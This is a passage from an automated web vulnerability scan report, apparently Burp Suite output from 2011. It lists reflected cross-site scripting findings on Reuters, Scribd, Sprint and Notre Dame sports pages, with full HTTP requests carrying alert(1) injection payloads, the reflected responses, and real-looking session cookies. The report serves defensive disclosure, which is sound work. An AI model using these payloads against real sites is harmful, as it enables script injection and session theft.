Content-Length: 10692

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF02 <![endif]-->
<!--[if !IE]> token: e8324ba3-74c3-4fec-b687-322963413326 <
...[SNIP]...

   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90669f1';alert(1)//52a8ec3cf2b',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashpla
...[SNIP]...

5.81. http://www.reuters.com/assets/newsFlash [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783fd'%3balert(1)//f2696c00016 was submitted in the w parameter. This input was echoed as 783fd';alert(1)//f2696c00016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728783fd'%3balert(1)//f2696c00016&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:45 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF25 <![endif]-->
<!--[if !IE]> token: b80bcee9-8c35-4d7a-945c-b4822a95f4d5 <
...[SNIP]...
ML output folder.");
   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728783fd';alert(1)//f2696c00016',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedi
...[SNIP]...

5.82. http://www.reuters.com/assets/searchIntercept [blob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload ae54f<script>alert(1)</script>793ad682c63 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=ae54f<script>alert(1)</script>793ad682c63 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; xa=xa%3Dn%3B; tns=dataSource=cookie; __qseg=Q_D|Q_T; adops_master_kvs=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115328770:ss=1315115075506; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097330.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; snas_noinfo=1; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:04:47 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 553

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF08 <![endif]-->
<!--[if !IE]> token: 4baec32d-d2a8-4ee9-bf4a-c3739e992737 <
...[SNIP]...
<div class="searchTerm">"ae54f<script>alert(1)</script>793ad682c63"</div>
...[SNIP]...

5.83. http://www.scribd.com/embeds/63688924/content [start_page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content

Issue detail

The value of the start_page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf51</script><script>alert(1)</script>3cb4a3abca9 was submitted in the start_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embeds/63688924/content?start_page=14bf51</script><script>alert(1)</script>3cb4a3abca9&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 48ms
Status: 200 OK
X-Cache: MISS from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:57 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<script type="text/javascript">window.manager = new Scribd.Embeds.Content({"branded_logo":null,"page_count":5,"start_page":"14bf51</script><script>alert(1)</script>3cb4a3abca9","view_mode":"scroll","from_jsapi":false,"document":{"num_pages":5,"title":"Summary of State Collective Bargaining Agreements ","id":63688924}});</script>
...[SNIP]...

5.84. https://www.sprint.net/min/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e50"><script>alert(1)</script>d3106908dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /min27e50"><script>alert(1)</script>d3106908dc/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/min27e50"><script>alert(1)</script>d3106908dc/" />
...[SNIP]...

5.85. https://www.sprint.net/performance [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7db"><script>alert(1)</script>ec756d68c15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance3d7db"><script>alert(1)</script>ec756d68c15 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:11 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance3d7db"><script>alert(1)</script>ec756d68c15" />
...[SNIP]...

5.86. https://www.sprint.net/performance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe549"><script>alert(1)</script>958e28ceb0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performancefe549"><script>alert(1)</script>958e28ceb0d/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:48:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performancefe549"><script>alert(1)</script>958e28ceb0d/" />
...[SNIP]...

5.87. https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e2"><script>alert(1)</script>a80de0e0c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1" />
...[SNIP]...

5.88. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c9e"><script>alert(1)</script>ad88d874842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php" />
...[SNIP]...

5.89. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8338f"><script>alert(1)</script>13d9de34be1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1" />
...[SNIP]...

5.90. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90061"><script>alert(1)</script>413bc0303e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:37 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php" />
...[SNIP]...

5.91. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c64e"><script>alert(1)</script>2f160f05d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:49 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b" />
...[SNIP]...

5.92. https://www.sprint.net/performance/performance.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/performance.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 380b8"><script>alert(1)</script>0c607eb5845 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:31 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf" />
...[SNIP]...

5.93. https://www.sprint.net/performance/performance.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/performance.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7085b"><script>alert(1)</script>c5bd3f6a3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:43 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1" />
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f73"><script>alert(1)</script>312ccc6a7af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066e"><script>alert(1)</script>1d9633a65ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:51 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
